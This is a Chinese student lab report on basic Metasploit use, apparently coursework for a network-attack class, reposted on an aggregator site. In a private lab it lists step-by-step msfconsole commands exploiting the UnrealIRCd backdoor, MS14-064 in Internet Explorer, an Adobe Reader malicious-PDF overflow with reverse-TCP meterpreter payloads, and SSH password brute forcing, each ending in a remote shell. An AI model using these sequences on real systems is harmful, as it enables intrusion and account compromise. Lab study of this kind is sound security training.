Exp6 MSF基础应用
Posted luoleqi
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Exp6 MSF基础应用相关的知识,希望对你有一定的参考价值。
实践内容
一个主动攻击实践,如ms08_067
攻击机:Linux kali 4.19.0-kali1-amd64 ip:192.168.160.150(NAT)
靶机:metasploitable-linux-2.0.0 ip:192.168.160.151(NAT)
利用漏洞:UnreallRCd后门漏洞(CVE:CVE-2010-2075)
原理:在2009年11月到2010年6月间分布于某些镜面站点的UNreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者就能够执行任意代码。
影响系统/软件:Unreal UnrealIRCd 3.2.8.1
攻击步骤:
#msfconsole
#use exploit/unix/irc/unreal_ircd_3281_backdoor
#set RHOST 192.168.160.151
#exploit
成功get shell!
一个针对浏览器的攻击,如ms11_050
攻击机:Linux kali 4.19.0-kali1-amd64 ip:192.168.160.150(NAT)
靶机:Windows XP pro with sp3 x86
利用漏洞:MS14-064
原理:OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过精心构造的网站执行任意代码。
影响系统/软件:Win95+IE3 – Win10+IE11全版本
攻击步骤:
#msfconsole
#use exploit/windows/browser/ms14_064_ole_code_execution
#set payload windows/meterpreter/reverse_tcp
#set LHOST 192.168.160.150
#set SRVHOST 192.168.160.150
#set AllowPowershellPrompt true(msf只对powershell的系统生效)
#exploit
#sessions -i 1
成功get shell!
一个针对客户端的攻击,如Adobe
攻击机:Linux kali 4.19.0-kali1-amd64 ip:192.168.160.150(NAT)
靶机:Windows XPattacker
利用漏洞:Adobe Reader栈溢出漏洞
原理:Adobe Reader和Acrobat中的CoolType.dll库解析字体文件SING表中的uniqueName项时存在的栈溢出漏洞,用户打开特制的恶意PDF文件可造成任意代码执行。
影响系统/软件:Adobe Reader 9
攻击步骤:
#msfconsole
#use windows/fileformat/adobe_cooltype_sing
#set payload windows/meterpreter/reverse_tcp
#set LHOST 192.168.160.150
#set FILENAME 5219.pdf
#exploit
成功get shell!
成功应用任何一个辅助模块
攻击机:Linux kali 4.19.0-kali1-amd64 ip:192.168.160.150(NAT)
靶机:metasploitable-linux-2.0.0 ip:192.168.160.151(NAT)
利用漏洞:弱口令
原理:暴力破解,使用攻击者自己的用户名和密码字典,一个一个去枚举,尝试是否能够登录。
影响系统/软件:所有
攻击步骤:
首先生成字典pass.txt(简单举例)
abcd
123456
password
msfadmin
#nmap -sV -p22 192.168.160.151(由于需要远程连接靶机,首先查看靶机ssh服务是否开启)
#msfconsole
#use auxiliary/scanner/ssh/ssh_login
#set RHOSTS 192.168.160.151
#set USERNAME root(设置登录用户名)(也可以用)
#set PASS_FILE pass.txt(设置字典)
#set THREADS 50(设置爆破线程数)
#exploit
#sessions -i 3(选择相应的会话)
成功getshell!
问题回答
1.用自己的话解释什么是exploit,payload,encode。
exploit;漏洞利用的过程。
payload:一段类似shellcode的代码,能实现提权等功能。
encode:将代码从一种形式或格式转换为另一种形式的过程。
2.离实战还缺些什么技术或步骤?
技术:信息收集技术,挖掘漏洞的技术
步骤:信息收集,已经持久性渗透(也就是维持后门权限等)。
内容来源
Metasploitable2 靶机漏洞(下)
Metasploitable2 靶机漏洞(上)
MS14-064 漏洞测试入侵win7
以上是关于Exp6 MSF基础应用的主要内容,如果未能解决你的问题,请参考以下文章
20174302 王漫天 《网络对抗技术》Exp6 MSF基础应用
2019-2020-2 20175335丹增罗布 《网络对抗技术》Exp6 MSF基础应用
2019-2020-2 20175204 张湲祯《网络对抗技术》Exp6 MSF基础应用